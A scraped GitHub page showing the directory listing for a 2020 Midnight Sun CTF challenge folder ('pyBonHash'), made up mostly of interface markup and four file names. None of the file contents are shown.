<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/ironore15/ctf/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":239170367,"originating_url":"https://github.com/ironore15/ctf/tree/master/2020-MidnightSun/pyBonHash","user_id":null}}" data-hydro-click-hmac="ff0d0e1d8eacecd98ea79e66e94162bf7d1a5775890da85d967d1dd31d639001"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/ironore15/ctf/refs" cache-key="v0:1581181692.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="aXJvbm9yZTE1L2N0Zg==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/ironore15/ctf/refs" cache-key="v0:1581181692.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="aXJvbm9yZTE1L2N0Zg==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>ctf</span></span></span><span>/</span><span><span>2020-MidnightSun</span></span><span>/</span>pyBonHash<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>ctf</span></span></span><span>/</span><span><span>2020-MidnightSun</span></span><span>/</span>pyBonHash<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/ironore15/ctf/tree-commit/ad0df2e3e7e1f0b5fcc3bcb6e24bb1b05510b83d/2020-MidnightSun/pyBonHash" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/ironore15/ctf/file-list/master/2020-MidnightSun/pyBonHash"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>hash.txt</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>pybonhash.cpython-36.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>pybonhash.cpython-36.pyc</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>solve.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 